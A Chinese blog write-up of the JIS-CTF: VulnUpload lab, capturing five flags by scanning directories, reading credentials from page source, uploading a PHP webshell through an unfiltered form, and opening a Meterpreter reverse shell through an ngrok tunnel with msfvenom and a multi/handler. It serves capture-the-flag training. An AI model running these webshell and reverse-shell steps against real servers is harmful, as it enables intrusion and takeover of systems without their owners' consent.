记录JIS-CTF: VulnUpload解题过程

最新推荐文章于 2024-08-11 21:27:48 发布
最新推荐文章于 2024-08-11 21:27:48 发布
阅读量1.4k 收藏
点赞数
分类专栏: CTF 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/124560670
版权

JIS-CTF: VULNUPLOAD

说明:我的环境是搭建在公网上的,如果是搭建在自己虚拟机的话实际操作并没有下面我写的那么复杂。

一、Flag_1

1.起初以为是sql注入,后来发现不是,没办法,拿御剑扫一波,竟然有意外收获

访问  http://xxx.xxx.xx.xxx:8889/flag 即可得到flag_1

二、Flag_2

1.在http://xxx.xxx.xxx.xxx:8889/robots.txt 中发现还有其他页面,其中只有 http://xxx.xxx.xxx.xxx:8889/admin_area/ 有东西

 

2.查看网页源代码得到flag_2,同时得到登录账号username:admin password:3v1l_H@ck3r

​ 

三、Flag_3

1.登录进来发现是文件上传,这里上传一句话木马即可,没有任何的过滤

2.从之前的robots.txt中可以推出上传路径为 http://xxx.xxx.xxx.xxx:8889/uploaded_files/ ,使用蚁剑连接即可

3.在终端模糊查询flag,找到flag.txt

4.但是flag.txt访问之后并没有回显出东西,但是在同目录下的 hint.txt中找到了flag_3

四、Flag_4

1. 这里提示查找 technawi 用户来读取flag.txt

使用如下命令查找有关 techhnawi 用户的文件:

find / -user 'technawi' 2>/dev/null

/etc/mysql/conf.d/credentials.txt 文件中找到flag_4

五、Flag_5

1.这里提供了technawi 的密码,根据之前的提示,很显然我们需要登录 technawi 这个用户,此时蚁剑已经不能满足需求了,我们直接上kali。

因为环境是搭建在公网上的,我们kali机在内网,所以需要进行内网穿透,首先在ngrok上搭建一个ftp服务,如下:

Ngrok官网:https://www.ngrok.cc/

2.打开服务

./sunny clientid 隧道id

3.生成一个webhell,种类很多,这里选择php,生成之后把这个shell上传

msfvenom  -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=80 -f raw > qwer.php

注:生成的webshell在当前目录下

4.对qwer.php修改ip和端口(ip和端口是Ngrok提供的ip和端口

ip: free.idcfengye.com

端口: xxxx

5.打开msf,输入以下payload,

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 80

run

6.访问我们上传的shell:http://xxx.xxx.xxx.xxx:8889/uploaded_files/qwer.php,然后run

输入以下命令:

shell

python -c "import pty;pty.spawn('/bin/bash')"

7.这时候我们就可以登录 technawi 了

Linux切换用户命令:su 用户名

8.进入/var/www/html 读取flag.txt即可得到flag_5

参考文章:

JIS-CTF解题思路及关键语句_花纵酒的博客-CSDN博客

weixin_48799157
关注
专栏目录
JIS-CTFVulnUpload实战靶机搭建及玩耍攻略
星|Donstpast
04-03 1844
最近玩了一把子vulnhub的volnupload靶机,需要完整找出五个flag,我格局小,只是为了得到flag,所以,本文或许基础知识不会很多。主要是想体验那种实战夺旗的feel。另外也相当预自己的一个笔记吧。 该靶机下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ 注:vulnhub中有很多优秀的实战靶机,自己可以下载下来去玩...
Vulnhub靶机——JIS-CTF: VulnUpload
Ho1aAs‘s Blog
05-20 1046
文章目录环境简介安装与配置 环境简介 JIS-CTF: VulnUpload主页 JIS-CTF: VulnUpload 下载虚拟机环境可以使用IDM之类的工具,能够跑满速,用浏览器自带下载很慢 主页提示环境共有5个FLAG Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags. 安装与配置 下载压缩包,解压,VMware导
VulnhubJIS-CTF靶机详解
最新发布
weixin_62457642的博客
08-11 830
靶机JIS-CTF速刷
JIS-CTF-VulnUpload-CTF01靶机渗透测试
weixin_52971422的博客
04-11 3550
靶机名:JIS-CTF-VulnUpload-CTF01 攻击机:kali 任务寻找5个flag 靶机信息扫描 Nmap -sV -A -p- ip 信息收集 发现有Robots协议 上网页 成功拿到第一个flag 上到/admin_area发现了第二个flag和网页用户 上到/login.php登录 登录上去后发现有个文件上传 直接上传一个shell.php上去看看 好像成功上传上去了,在前面robots.txt里有uploaded_files的
JIS-CTF : VulnUpload 题解
weixin_33676492的博客
03-26 219
思路 1. nmap扫端口 2. WEB先查 robots.txt ,然后目录爆破 3. 留意文件中隐藏的内容 4. 查看/etc/中程序中的配置,找登陆凭证 Flag 1 爆破目录与文件,发现/flag/目录,访问获得第一个flag The 1st flag is : {8734509128730458630012095} Flag 2 访问爆破的目录/admin_area/,发现第二个flag...
靶机渗透训练——JIS-CTF-VulnUpload-CTF01
z7sz的博客
06-22 496
这是一篇关于JIS-CTF-VulnUpload-CTF01靶机训练的文章
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
OWASP果汁商店CTF扩展 Node包可以帮助您准备针对不同流行CTF框架的挑战的事件。 此交互式实用程序使您可以在几分钟内填充CTF游戏服务器。 支持的CTF框架 juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 ...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
JIS-CTF_VulnUpload靶机攻略
徐海洋
03-01 536
JIS-CTF_VulnUpload靶机攻略
ctf网络安全攻防练习题
12-04
ctf网络安全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
JIS-CTF-VulnUpload-CTF01
weixin_42326809的博客
03-16 230
扫描端口,扫描目录 flag1 burp爬虫发现 flag2 上传webshell 根据robots文件,访问uploaded_files/sera.php 翻文件拿到flag3 根据提示找technawi密码 grep -ri --exclude-dir=proc/ ‘technawi’ / 2> /dev/null flag4 ssh登陆查看flag.txt flag5 ll发现存在 .sudo_as_admin_successful,尝试提权 END ...
OSCP - JIS-CTF-VulnUpload-CTF01 的破解
kevinhanser
04-13 3632
本文主要记录JIS-CTF-VulnUpload-CTF01 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:JIS-CTF-VulnUpload-CTF01 VM - JIS-CTF-VulnUpload-CTF01 的破解 2019年4月13日19:19:03 【原创】 1. 官方描述 VM Name: ...
Vuln uploadCTF01记录
weixin_43736033的博客
12-20 373
扫描主机: 扫描开放端口: 开放了22端口和80端口 访问了一下主页。 用御剑扫了一下目录 扫描到robots.txt 访问robots.txt 分别访问 发现三个页面存在 发现第一个flag 打开三个页面看到 http://192.168.222.129/admin_area/ 源码 发现了账号和密码,到主页面尝试登陆 发现文件上传, 上传一句话 成功 利用刚刚robots....
JIS-CTF 靶机渗透
qq_43235703的博客
02-02 2298
渗透之JIS-CTF靶机 攻击环境 攻击机:kali(10.0.10.223) 靶机:在vmbox上(10.0.10.221) 连接设置:两台均为桥接网卡 探嗅目标 netdiscover -i eth0 _____________________________________________________________________________ IPAt MAC Address...
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 3311
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
单机渗透实战:JIS-CTF-vulnupload | 端口扫描与漏洞挖掘
在这个过程中,学员会发现存在目录遍历漏洞。 继续实验,尝试访问robots.txt文件,可能发现有关文件上传服务的线索。利用已知的admin_area账号密码登录,验证到这是一个允许文件上传的功能。 然后,学员需要创建一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值